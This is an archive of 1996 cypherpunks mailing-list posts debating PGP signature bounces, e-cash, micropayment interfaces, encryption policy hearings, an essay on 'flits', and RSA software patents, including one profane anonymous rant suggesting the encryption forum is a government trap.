 subscribe iag
 
 This initialization of the IAG is the democratic decision of the
 cyber-rights list, cr@deliberate.com.  To join this group or to
 communicate with us, your message to majordomo@deliberate.com
 should say "subscribe cr".

                 <Please circulate widely.>










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sun, 23 Jun 1996 02:57:15 +0800
To: stewarts@ix.netcom.com>
Subject: Re: FW: Bashing "Wired"
In-Reply-To: <199606220824.BAA26718@toad.com>
Message-ID: <sln00c200YUwI2kng6@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 22-Jun-96 Re: FW: Bashing "Wired" by
Bill Stewart@ix.netcom.c 
> At 09:32 AM 6/21/96 -0700, Tim May wrote:
> >And notice that increasingly the "journalists" are the quoted thinkers and
> >strategists in important areas? Someone majors in English, starts writing
> >for "Netizen" or "HotWired," and the next thing you know they're debating
> >crypto policy with Conrad Burns and Dorothy Denning. We're in an age where
> >the medium truly is the message
>  
> You don't think the rest of the press is truly any better, do you?
> At least on the net, you get to see the horse's mouth on a bad day,
> and sometimes you can even meet the people and track down the rumors 
> hat eventually become headlines, and pull the wool over your own eyes.

Bashing Wired is, in fact, a bit tired itself. I recommend checking out
<http://www.howtired.com/> for one treatment.

Now I'm no fan of Katz's front-pager -- I thought it maundered about and
was twice as long as it needed to be. But folks who write for Wired like
Jim Warren, Brock Meeks, and Mike Godwin (and Katz) do hang out online,
basically know what's going on, and are approachable.

Somehow, I suspect that cypherpunks aren't Wired's target audience...

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 23 Jun 1996 06:53:52 +0800
To: cypherpunks@toad.com
Subject: Re: Bad Signatures
Message-ID: <adf17bba000210045c25@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:12 PM 6/22/96, geoff wrote:

>I am not convinced. For a mailing list it makes sense for all members
>to be aware of message integrity problems. Not all cypherpunks have
>your lisp package or Pronto Secure which make signature verification of
>the 10-20 pgp signed messages per day on the list a non trivial task.
>
>I also like the idea that cpunks provides as a byproduct a platform for
>developers to test and debug their security products. We really should
>be getting the bugs out of plain text signatures. You cannot expect Joe
>User to differentiate between an intruder and a gateway massaging the
>message.
>
>Geoff Klein
>Pronto Secure Product Manager

Trusting others to perform cryptographic functions (encryption, decrytion,
signing, signature verification, etc.) is counter to the usual notions of
security.

Of course, people are free to ask others to do cryptographic functions for
them, to tell them which signatures are valid, and which are not. It's a
free society, after all.

However, I think there's already enough traffic on this list without having
"bounce" messages chastising folks for having signatures that for one
reason or another failed their tests. (Could be munging at _their_ end, for
example.)

Those who want to compile lists of "bad signatures," as determined by their
tests, could include a pointer to a URL at their site which says something
like "A list of suspected bad or improperly-formed signatures may be found
at hyyp://www.key-trust.org"

This heads off having a message with a bad sig generating N more messages
to the list announcing some conclusion or another about the sig. Not
something we need.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 23 Jun 1996 07:01:10 +0800
To: cypherpunks@toad.com
Subject: Re: Bad Signatures
Message-ID: <v02120d8cadf1df6287ff@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 18:12 6/22/96, geoff wrote:

>> Further, it makes philisophical/political sense to me to have
>> verification distributed.  Every node should be doing it's own
>> security.
>
>I am not convinced. For a mailing list it makes sense for all members
>to be aware of message integrity problems. Not all cypherpunks have
>your lisp package or Pronto Secure which make signature verification of
>the 10-20 pgp signed messages per day on the list a non trivial task.

If you think about the issue in more detail, you will realize that having a
third party do signature verification is no more useful than having a third
party do your encryption for you. In other words, not only is it not
useful, it is downright dangerous, since it provides you with a false sense
of security. If someone wishes to bounce messages that don't verify back to
the originator, great. But please do not further add to list traffic by
bouncing these messages to the list.

Thanks,


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
   Disclaimer: My opinions are my own.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cynthia Deno <cynthia@usenix.ORG>
Date: Sun, 23 Jun 1996 07:07:57 +0800
To: cypherpunks@toad.com
Subject: Practical Solutions at USENIX SECURITY Symposium
Message-ID: <199606221754.KAA06702@usenix.ORG>
MIME-Version: 1.0
Content-Type: text/plain



If you are responsible for your company's computer security,
you may want to attend the 6th USENIX Security Symposium - 
Focusing on Applications of Cryptography, in San Jose, CA,
July 22-25, 1996.

There will be refereed papers, invited talks, BoFs, and Vendor
Exhibits.  Tutorial speakers include Ed DeHard, CERT; Dan Geer,
Open Market; Jon Rochlis, BBN Planet; Marcus Ranum, V-One; 
Matt Bishop, UC Davis; and Bruce Schneier, Counterpane Systems.

For detailed information, please visit our Web site:
http://www.usenix.org, or send email to: conference@usenix.org.


/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
| Cynthia Deno            |                           USENIX
|
| Tel: 408 335 9445    |  The UNIX and Advanced Computing Systems |
| Fax: 408 335 5327   |        Technical and Professional Association     |
| cynthia@USENIX.org |
|
| Check out USENIX on the Net..........http://www.USENIX.org                |
/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 23 Jun 1996 00:15:57 +0800
To: cypherpunks@toad.com
Subject: Reno's Cyberspace Address
Message-ID: <199606221108.LAA09746@pipe1.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Thanks to LG: 
 
   "Law Enforcement in Cyberspace Address by the Honorable 
   Janet Reno, United States Attorney General." 
 
   Presented to the Commonwealth Club, June 14, 1996. 
 
 
   http://pwp.usa.pipeline.com/~jya/addres.txt  (25 kb) 
 
   ADD_res 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Omegaman" <Omegaman@betty.bigeasy.com>
Date: Sun, 23 Jun 1996 10:02:16 +0800
To: cypherpunks@toad.com
Subject: Re: Bad Signatures
Message-ID: <199606222228.QAA00570@betty.bigeasy.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> From:          geoff@commtouch.co.il

> 
> IMHO Getting message authentication to work correctly should be a 
> cypherpunk objective.

how does posting notifications to the list satisfy that objective?
read on....

> Putting something like "Bad Signature Notification" in the subject will 
> make it quite easy for not-interested readers to killfile.

True.  But my opinion is that this list isn't the appropriate place 
for it.  Opinions were asked for, that is mine.  A separate list 
maybe...

> BTW this is the first time I have sighted the word "veracity" being 
> used in relation to signatures. Is the term used elsewhere? Could it be 
> used to separate the integrity property of a signature from its 
> authenticity property?

Oh lord. I don't want to get into semantic hair-splitting.  It's the 
word I chose at the time.  It may be the wrong one.  Don't read too 
much into it.


To put the issue simply.

Bob doesn't like Jane for whatever reason.  Jane signs all her 
messages with PGP.  Bob posts false" bad signature notifications" to 
the list to discredit Jane.  Am I to just read Bob's messages and 
believe the notifications he's posted.?  No.  I still have to examine 
Jane's messages myself for signature authenticity.

I understand that this is one person who wants to perform this 
service objectively.  But why should I trust his motivations?  I 
still have to do my own individual signature checking to be sure.

For this reason, I think the idea accomplishes little.   The 
intentions are good, but I don't see a major benefit.  Maybe someone 
else has another idea or angle....

me

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMcwm5ab3EfJTqNC9AQGl3gP9HD4mhPY6dg69ZaWTeUYEsm+45rDFkgWW
mNDbfeudTAgfl6Jdnm+xs0g+yfZcQQUe5g/qBpp0Nk0SRyzzL+mq+U+CJr9GA6Pr
Mm3a3JY65mwYqTis1dO4FzHDvmhlN5GaBlQT0HOGPywQZGkMf3IXCGZIDZG7z4lH
V6/4Y94A7ho=
=paU2
-----END PGP SIGNATURE-----
-----------------------------------------------------------------------------------------------
Omegaman <omega@bigeasy.com>
PGP Key fingerprint =  6D 31 C3 00 77 8C D1 C2  
                                  59 0A 01 E3 AF 81 94 63 
Send E-mail with the "get key" in the "Subject:" field
to get my public key
---------------------------------------------------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@c2.org>
Date: Sun, 23 Jun 1996 08:15:09 +0800
To: cypherpunks@toad.com
Subject: ISAKMP Security Architecture
Message-ID: <199606221921.MAA22323@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Sat Jun 22 14:20:39 1996
Some of the subscribers to this list might be interested in the following 
URL:

http://web.mit.edu/network/isakmp/ciscokmp.html

It is a link to Cisco Systems ISAKMP distribution.  Cylink and RSA have 
both announced support of the protocol.

Lou Z.

Lou Zirko                                (502)383-2175
Zystems                                  lzirko@c2.org
"We're all bozos on this bus" - Nick Danger, Third Eye

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1

iQEVAwUBMcxHqctPRTNbb5z9AQEGTAf9H+PXHJ1J1c4gfVCqRaRZhI0adRqJAiwk
b+B9f8OQMeXcgWiFHtpGtEm5roOQT2qujwjDXLGNKvWCtPbkJvmlbwLgwGkCtykx
Ndycy3fjz0oWimCpb+GI2MLPTgs4xMHmMck0TaeVDaxV9+G+GTekOD/jDgNptpxn
gmNJbw3Ww84XTUGswLofhBZTikjkhXLgFWv6lx408Yxp65b+XEEneGqGh/k7z9CW
BsXFu50y6JN5/aacztWg1krFHXVD8Msw3cqEMQ5YiiKF5lt0VILOxTOLxIURCkim
lpTZ9AqDE+2WwVWc3ltumb1kyRKbJQvgcS0i27OHMGlUv0GEk99Trg==
=700Q
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 23 Jun 1996 07:58:39 +0800
To: snow <nelson@crynwr.com
Subject: Re: Cash Is Dying
Message-ID: <2.2.32.19960622194217.00a623f4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:10 AM 6/22/96 -0500, snow wrote:
>On 21 Jun 1996 nelson@crynwr.com wrote:
>> Cash is anonymous.
>
>	And will remain as long as it still is. E-cash is a great idea,
>and I hope to see it _really_ working soon, but it will not be anonymous
>anytime in the forseable future.
>
>	Also, people won't trust it. Not the people that read this list, I
>trust some of the people here, and if they say it works, I trust that. Not
>just one, but _all_ of the group I trust. No, people like my parents and
>other relatives. People smart enough to read the papers, and smart enough
>not to trust everything the "experts" say. 

After hearing some of my friends and aquaintences rant about the little
metal strips in money and how it is a conspiracy to see how much cash you
have in your pockets from the orbital mind control satelites, I am just
waiting to see what they will say about e-cash.  Probibly something about
the hidden methods the government will force into the protocol to enable
them to track each and every transaction.  (Better not say that too loud
though, or they might get ideas...)

You will know that e-cash is here to stay when the conspiracy freaks latch
onto it as the next increment of the "Number of the Beast(tm)".

>	Cash is easy, cash is plentiful, you can hold cash in your hand
>and KNOW that you have it.

And you do not have to check in with the bank every time you spend it...

---
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 23 Jun 1996 09:52:02 +0800
To: cypherpunks@toad.com
Subject: info assembly line, "flits" (long)
Message-ID: <199606222047.NAA26324@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



these are a few ideas I've been working on intermittently for
some time on the possibility of an "information assembly line"
of the future.

Alvin Toffler was one of the first futurists to predict the
"third wave" or information economy. we are very steadily moving
our way into this new shift, with numerous signs attesting to
it, and reactionary forces ("Buchananism", see recent Wired)
arising as well.

however, we are only at the tip of the iceberg. even state-of-the-art
information economies like Silicon Valley I would not consider full
implementations of the idea. what would it really mean to have
an entire economy that is related to information? (caveat: I 
certainly am not saying that we will no longer have physical goods,
this is a misunderstanding of Toffler's thesis, and anyone who wants
more info on this point should consult his writing).

Moore's law comes to my mind, the trend that computer capability has
been doubling approximately every 18 months ever since chips were
first invented. what could this power have on a future information 
economy (henceforth abbreviated IE)? I tend to think that the future 
IE will make the current world wide web look like child's play, although it
will be built on top of it. we are far from implementing the full
capabilities of information technology in our economy.

==

first, I think the use of microcurrency is going to play a very
major role in the future IE. it will allow people to easily own
mini-businesses in much the same way the web has allowed everyone to
own printing presses. I've written elsewhere on cybercurrency, but
I also tend to think it will have the effect of creating new
monetary standards. whereas in our current economy, wealth is
typically tied to major world economies, particularly the US
through dollars, I've said how I think stocks will come to be
thought of as a kind of currency, and that any company that sells
stock is essentially circulating its own currency. I think the
short term effect of cybercurrency is going to be a grafting on
top of existing government cash schemes, but that much to their
chagrin they are going to eventually realize it tends to make
their own regulatory and supervisory role obsolete-- or at least
displace it.

==

now imagine taking the cybercurrency concept and applying it
to an information economy. what you will tend to see is that 
cash transfers will increasingly be automated. cash will be
like the blood flow of society. you will see companies automating
their payment processes so all the man-labor associated with
handling the paperwork will tend to evaporate. you will of
course still have verification systems that prevent payment
when payment is unjustified, but the massive frameworks and
bureacracies inside companies today that are used to deal with 
cash flows will tend to be automated and diminished in size.

==

the idea that strikes me most about an information economy
is that you're going to see systems that are similar to the
concept of the assembly line for the industrial economy. 
I believe we will literally see information assembly lines
in the future. what kind of form would they take?

we already have "information assembly lines" in companies today
but they are abstract concepts of flow of work that are
not fully automated. parts of the assembly line involve people
moving around documents, sending letters, having conversations,
etc.  I tend to think that much of this will be increasingly
encoded in cyberspace. a company will see its role as an
information processing component. 

let's say this sample company gets a work order. the primary 
means of transfer will be through cyberspace. today cyberspace
is seen as an adjunct to paperwork-- the paperwork is primary,
but you can put the paperwork in cyberspace file cabinets, 
send it via cyberspace, etc.  I believe this will exactly flip
in the future, so that the paperwork is seen as an adjunct to
cyberspace. the documents will be freely transportable in 
cyberspace, and one can always track their location, just like
one can always see where some object is on an assembly line.
the work order will be thought of as primarily a document 
existing in cyberspace, with it taking various forms in
different places on the assembly line based on actions of the
information workers, who process it and tie it with other
documents, etc.

==

what does today's cyberspace lack to pull off this vision? after
a bit of thought I think one word to describe it might be
"continuity" or "persistence". there are so many obstacles in cyberspace to
transporting documents. it requires too much manual effort
on the part of each person to translate documents into particular
formats, send them via email, etc.  what we need is the cyberspatial
equivalent of continuity: people anywhere can look at the same
object and see the same thing, and that thing can be moved around
in cyberspace without ever losing its identity.

the problem is that today the concept of a "document" in "cyberspace"
is merely a concept. I can't point to some "place" in cyberspace
when I want someone to grab a document from me. I can't say, "here
it is". I have to go through an artificial series of steps to
encode the document, such as emailing it, ftping it, 
uuencoding it, or whatever.

what I am getting at is that we need a kind of virtual reality to
pull off the information assembly line to its utmost potential. I
believe we literally need to create a visual metaphor for the 
information assembly line that transcends the concepts of email,
different computers, etc.  I should be able to "pick up" and "move"
a document in cyberspace as easily as I move a piece of paper in
the real world. the whole system of different servers, different
software packages, different protocols, all this should 
be *invisible*  to me in the same way it is invisible on the current
WWW.

imagine that one actually created a total virtual reality 
information assembly line. what kind of form would it take? you
would see different things that can be done to documents
as "tools" that can be applied to them. you would see their
locations as simple visual metaphors that ignore the concepts
that segregate information. for example, you might see a single
file cabinet that represents every record in an entire company,
regardless of its location anywhere in that company. tough to
pull off? of course, but this is what we are headed towards, in
my opinion.

===

I've written multiple times about Negroponte's ingenious concept
of "bits vs. atoms". in the above spirit, 
I think we need a slight additional paradigm
shift on the concept of bits, something I call a "flit". 

the concept of a bit is too abstract for me. for a virtual reality
and an assembly line, I would prefer to say that information has
two additional components other than a binary true/false value:
a *location*, and a *time* that it is at a location. in this way
information better matches our reality that we deal with every
day. I would say the "flit" concept is a pivotal missing link
in creating an information assembly line.

I would say that an information assembly line document is
actually composed of "flits" instead of bits. each "flit" can
have a different location at different times in cyberspace.
it is a sort of "fleeting bit", a bit that can move around to
different places.

this requires a somewhat radical shift in current technological
thinking. currently we see data as stationary stuff that sits
in some place, and people come along and run programs that
churn up the bits and spit out new bits. but the new bits are
not nicely tied to the old bits except through our own memories.

==

instead I would say that the key concept of information is to
say that it has a content and a state at some time. a document
composed of a bunch of "flits" can be broken up into its 
component "flits", and the "flits" can be sent in different
directions and recombined into different documents. but because
they are "flits", I can *trace* their destinations over time.

what does this mean? it is the concept of debugging applied to
information technology. imagine that I once had a document, and
I want to know what happened to it. because it is made of 
"flits", I could say, "where did the flits that comprise this
document go?" I would get an answer about their entire history--
what programs the moved through, how they were recombined, 
where they now reside. I could trace backwards too. "where did
this flit come from?" -- the system would trace the origination
of the flits.

what the flit concept does is introduce a *context* to a bit.
a bit has no "context".  where did a bit come from? the situation
with information is that it always has a *context* and is tied
with other information. (so in addition, I might like to suggest
that "flits" can be "tied together" with each other).

when today's software spits out some document, there is nothing
necessarily tying that document with the original input except
the memory of the humans. I would suggest that the information
assembly lines of the future will replace this concept. nothing
will be left to the imagination. things that are part of people's
memory today will be made explicit in the systems of tomorrow.
the abstract concepts we have of systems being "tied" together
will look very embryonic and impoverished compared to these
new techniques.

"flits" would have an identity irrespective of companies. one
could track them moving through different companies if necessary.
(the "flits" might therefore also have security aspects associated with
them.)  the point is that the data must not be disconnected, it
must be seen as continuous, and I think a flit-like concept is key
to accomplishing this.

==

notice today how much our systems diverge from the flit concept.
we are always losing bits, and not tying them together. whenever
a system goes down, all those bits evaporate. this would not
be acceptable in a flit universe-- it would be like an object
suddenly blinking out of existence. obviously we don't consider that
an acceptable behavior of objects in our current reality, why
should we allow it in cyberspace? cyberspace has a long ways to
go. today's cyberspace is barely sufficient for what is required.

in a flit universe, I would like to see flits "pile up" in a
queue when a machine breaks, like what happens in a real 
assembly line. the assembly line metaphor is really crucial
here. imagine that on some assembly line, all your objects
suddenly disappear when a machine anywhere on the assembly
line breaks. you have to then run other machines to "bring
back" the flits. a ridiculous concept. instead, I'd like to
see flits pile up when some machine goes down on the assembly
line. once you get the machine running, it automatically starts
back going through the flits.

a lot of this implies "transaction tracking" by conventional
standards. I would suggest that "transaction tracking" and
integrity assurance are only the barest rudiments of what is
required to pull off an information assembly line. the 
belief that these are now considered incredibly cutting-edge
and state-of-the-art technologies
is a good indication of how far we have to go.

==

I mentioned Moore's law above because I think it takes care of
all objections that "so and so that you are proposing would take
too much time". imagine that we have virtually unlimited 
computational capabilities-- what could we then do with this
kind of power? tracking "flits" would be an excellent use
for all this power, imho.

in future essays I may explore further the properties of flits
and give more examples.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: szabo@netcom.com (Nick Szabo)
Date: Sun, 23 Jun 1996 11:53:05 +0800
To: cypherpunks@toad.com
Subject: Accounting costs: the need for better metaphors
Message-ID: <199606222317.QAA28081@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



To assess the desirability of a transaction, and to avoid being mischarged,
the parties to a transaction have to count up, ie account for, the 
money paid for particular products and services --  whether making 
sure that cash payments ar made as promised (eg looking at the 
display as products are scanned at the store, or the receipt afterwards), 
or making sure the phone bill is proper.  Herein I use "accounting" in
this broad sense.

I may be paying in cash, but I'd still like to keep track of how 
and why my cash is going in and out, for many of the same reasons 
that accountants reconcile and analyze book entries.  Right now a 
transaction log (whether ecash(tm)'s or a credit card's) is the 
most useful way to do this.  There may be other metaphors 
more appropriate for some circumstances (eg, eg absolute level gauges, 
rate gauges with high and low water marks, etc.); this is a potentially 
fertile new field to explore.  There may be agents that can do some
of the accounting (eg comparing payments made to terms promised, 
payment limits, etc.), but for the vast majority of products and
services software cannot judge the quality or personal desire for 
the product or service, and thus the net desirability of the 
transaction.  The user must undertake this comparison with whatever 
information the computer can provide via the display.  The user 
interface and the cognition of the user thus remain the bottleneck 
to transaction granularity.

A big task is to use the power of GUI to come up with new metaphors to make 
this easier.  It is the intuitive yet accurate metaphor that will lower
accounting costs.  Cryptographic protocols potentially lower only 
security-related transaction costs such as forgery and extortion.
For the normal accounting transaction costs, which are currently 
too high for micropayments, we need better interactive visual
metaphors.

For transactions free of records, we need transactions
that can be fairly transacted once, immediately accounted for
by the parties via a nice visual metaphor, then forgotten.  The 
potential for unresolvable disputes in record-free systems is vast for 
transactions where this is not possible (probably most
of desired commerce: where quality of a product or service 
cannot be well determined until after the purchase 
transaction is complete, or where credit is involved).

Price is one kind of contractual term; we also need nice metaphors
to keep track of other kinds of contractual terms.  Lack of 
observability of the protocol on the part of the user leads to 
the ability of the counterparty to engage in hidden actions.  
See "http://www.best.com/~szabo/smart.contracts.2.html" 
for further discussion of this and other computerized contracting 
issues.

One of the barriers to creating good contracts is determining
what the parties want in the first place.   People tend to think
in terms of standard or stereotyped conditions: payment in dollars,
investing in stocks, etc. when there exist a far wider variety of
alternative contractual structures that, combined properly, could 
better meet the parties' needs.  I'd like to see tools which allow 
parties to explore their desires interactively with the computer.  In 
finance this might include interactive personal yield curves, determining 
the partial order of desires (as in decision theory) for particular 
alternate securities, derivatives, and synthetics; and so on.  Software 
would then analyze this input, make recommendations, and even undertake
automated contracting(*).  Metaphors should be developed so that make it 
easy for lay users to express such desires without extensive knowledge of 
finance or decision theory.  Such metaphors would provide a friendly
front end to automated exchanges, auctions, and other online 
contracting mechanisms.

Currently budget programs (like Quicken) provide some of the
metaphors, and financial analysis programs provide extensive
feedback on the cash flow properties of particular contracts,
but a potentially large untapped market lies between in a 
combination of these two technologies.

(*) contracting-like transactions done by automated agents raise
interesting questions about what constitutes a "meeting of the
minds".


Nick Szabo
szabo@netcom.com
http://www.best.com/~szabo/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: szabo@netcom.com (Nick Szabo)
Date: Sun, 23 Jun 1996 12:23:12 +0800
To: www-buyinfo@allegra.att.com
Subject: Re: Micropayments: myth?
In-Reply-To: <13618.835214087@odin.nma.com>
Message-ID: <199606230001.RAA09507@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



A general limitation of level and rate gauges is that they apply
only to fungible commodities.  One gallon of gas is roughly as
good as any other, and one dollar is as good as any other(*),
so that the a gas pump gauge reflects the information important to the 
gas buyer.  Where variety in quality or features is important, or 
different products and services need to be purchased, the graphical
display of levels and rates does not reflect that information.

For this reason, most Internet commerce purchases are made by filling
out forms, the user selecting various features to be included in the
shipped product.  Such information cannot be reflected in a gauge,
and interaction by filling out forms is far too expensive for
micropayment transactions.  Incomparable transactions lumped
into a summary lose important information, while mathematically
comparable transactions so summarized do not (as long as the
summary display properly reflects the mathematical relationship).
Incomparable purchases must be looked at separately to
determine whether one was charged a fair rate, or whether the
transaction will be or was desirable.

There are some potentially fungible Internet commodities: bandwidth,
disk space, CPU time, memory, etc.  Such transactions can be summarized
losslessly, and comparability also facilitates agents automation,
so these areas provide a potential niche for micropayments.  However,
before such commodities can be traded they must be somehow be unbundled
from each other and related factors which may (availability, 
response time) or may not (human support) themselves be fungible.
Keeping track of a wide variety of unbundled services is itself
a big transaction cost.

Nick Szabo
szabo@netcom.com
http://www.best.com/~szabo/

(*) In general, currencies are linearly comparable via exchange
rates, so that currency exchange can be accurately summarized via 
gauges.  More sophisticated financial transactions require more
sophisticated interfaces.  Many of these relationships can 
in principal still be graphed continuously and even monotonically, 
but there are a wide variety of such relationships, so our work 
is cut out for us here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 23 Jun 1996 12:18:28 +0800
To: cypherpunks@toad.com
Subject: Re: CDT Policy Post 2.25 - Senate Encrypti
Message-ID: <199606230004.RAA25208@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


>In a historic first that demonstrates the increasing power of the Internet
>Community as a political force, HotWired, DIGEX, the Voters
>Telecommunications Watch, and the Center for Democracy and Technology have
>teamed up to provide a live, interactive "cybercast" of the Senate Commerce
>Subcommittee encryption hearing on Wednesday June 26.
>
>The "cybercast" will provide netizens concerned about privacy and security
>on the Internet the ability to participate in the hearing, ask questions of
>the witnesses, and submit comments for the record.  Details on how you can
>participate are printed below.
>
>This hearing is the second encryption hearing held before the Senate
>Subcommittee on Science, Space and Technology; the first hearing was held
>on June 12.  Subcommittee Chair Sen. Conrad Burns (R-MT) presided over both
>hearings.
>

Of course except for PRZ they didn't invite anyone who cares about privacy
(see later in this msg) What a fucking joke. Typical statist.

>TELL CONGRESS WHY ENCRYPTION IS IMPORTANT TO YOU - ADD YOUR VOICE TO THE
>CONGRESSIONAL RECORD
>
>Senator Burns, Senator Patrick Leahy (D-VT) and the other sponosors of the
>Pro-CODE bill want to hear from the Net.community about why encryption is
>important to privacy and security on the Internet.
>
>Please be sure to visit http://www.crypto.com/ and add your voice to the
>debate over encryption policy on Capitol Hill.  Responses will be tabulated
>and the results, along with selected statements, will be included in the
>Congressional Record by Senator Conrad Burns.  The restults will also be
>featured during the Security and Freedom through Encryption Forum (SAFE) on
>July 1 (details on that event are attached below).
>
>To add your voice to the crypto debate in Congress, visit:
>
>   http://www.crypto.com/submit/
>

Right. Sure. And then they have a record of all the ppl interested in
cryptoprivacy (keep reading)

>ATTEND THE SAFE FORUM - JULY 1, 1996 STANFORD CALIFORNIA
>
>On July 1, 1996, in the heart of California's Silicon Valley at Stanford
>University, members of Congress, prominent computer industry leaders and
>privacy advocates will meet to discuss the need to reform U.S. encryption
>policy.
>
>The event is FREE and open to the public, but space is limited and is going
>fast.  To find out more, and to reserve your free ticket, visit the SAFE
>Forum Web Page at:
>
>  http://www.crypto.com/safe/
>

And sign up for a free trip to the roundup of people who want privacy. Coming
soon to a police state near you. WHY THE FUCK DO THEY NEED TO KNOW YOUR
NAME FOR THIS SHIT??? WHY IS NO ONE ASKING THIS???

Look carefully at who's sponsoring this. Who are they, and where does
the money come from? Hint: three letters.

Notice how they don't use PGP to sign the msg? Wonder why?

[///// THIS LINE ADDED BY EZBBS-MAIL / DO NOT DELETE / MSGID-33f107 / END /////]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 23 Jun 1996 07:19:44 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Programmers and Hackers v/v Patents, Intellectual Property, etc.
Message-ID: <199606221735.KAA00959@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Addressed to: Bill Stewart <stewarts@ix.netcom.com>
              Paul Penrod <furballs@netcom.com>
              Cypherpunks <cypherpunks@toad.com>

** Reply to note from Bill Stewart <stewarts@ix.netcom.com> 06/22/96 01:20am -0700

= At 02:57 PM 6/21/96 GMT, attila <attila@primenet.com> wrote:
= 
= >        personally, I think RSA has been most generous in their 
= >    licensing: a personal use license of the basic algorithm is free. 
= >    How do you suppose PGP really exists?  it's free!  RSA has done 
= >    more to advance cryptography with this policy than any other in many
= >    years.  the political and public relations benefits to our rights 
= >    to cryptography and the public relations bonanza for public 
= >    awareness is not even estimable, let alone measurable.  The Federal
= >    persecution of Phil Zimmerman was a PR bonanza and a rallying cry.
= 
= One of the main reasons that PKP let people use RSAREF free was that,
= mostly through PGP, people were already using it; this lets them both
= control the market to the extent that they can as well as letting
= free-software writers advance the state of the art and make commercial
= companies and their markets aware that RSA is the algorithm to use.
=
	absolutely.  if you are being "bootlegged" on a basic conceptual patent by a 
    class of users which are impossible to either regulate or litigate (individual 
    users), might as well maximize your advantage --in this case, the combination of 
    the privacy aware and the intense effort of the government to suppress 1,2,4, and 
    5 combined for a reward of public awareness which would be difficult to attain 
    any other way, particularly for free --I seriously doubt that even saturation 
    advertising time during superbowl would be effctive! (joe sixpack audience)!
 
= >        on the other hand, the Free Software group, despite the 
= >    tremendous value to those of us who develop, does nothing to
= >    protect our basic freedoms, and place the issue before the U.S. 
= >    (and world) forum.                                                   
= 
= The League For Programming Freedom, closely intertwined with FSF,
= has been lobbying against software patents for a long time.
= Maybe it's a losing battle, but they've been one of the prominent
= sets of good guys.  And then there are heavy-duty GNU supporters,
= like Cygnus Support (which makes its money developing and supporting
= free software), one of the co-founders of which was John Gilmore....
=
	free knowledge is a state of mind. free software takes away the "American" 
    work ethic incentive. when a nation state (or state or world, etc) decides to 
    appropriate the work of a class of entreprenuers (say software developers), there 
    will be no more creative productive results; few, if any, programmers will work 
    14-20 hours per day, 7 days a week for what could be several years unless they 
    are: 

	    a)  crazy (good possibility); 
	    b)  deranged (more than a few whom I know fit this class)
	    c)  obsessed (goes with the turf)
	    d)  hoping to swing on the brass ring (not the gold ring).

	I never met or hired a "real old-style hacker" programmer who did not fit 
    _ALL_ 4 of the above categories and was not obnoxious as well.  It is the same 
    difference which separates real hackers from programmers:

	    a)  what languages do hackers use?

		    any, except they do not waste time on x86 

	    b)  where do you find hackers?

		    in a (usually rented) place in the Valley (pick one) in a room 
		    littered with old newspapers and fast food bags, lit only by the 
		    glow of a CRT...

	    c)  what's the real difference between hackers and programmers?

		    programmers code; hackers tweak!
 
= But yes, software patents do mostly suck....
=
	that's the basic idea.  the only useful patents are like those owned by RSA 
    which protect a fundamental principal.  The rest of softwware success is 
    marketing and intimidating anyone who copies your basic ideas which are protected 
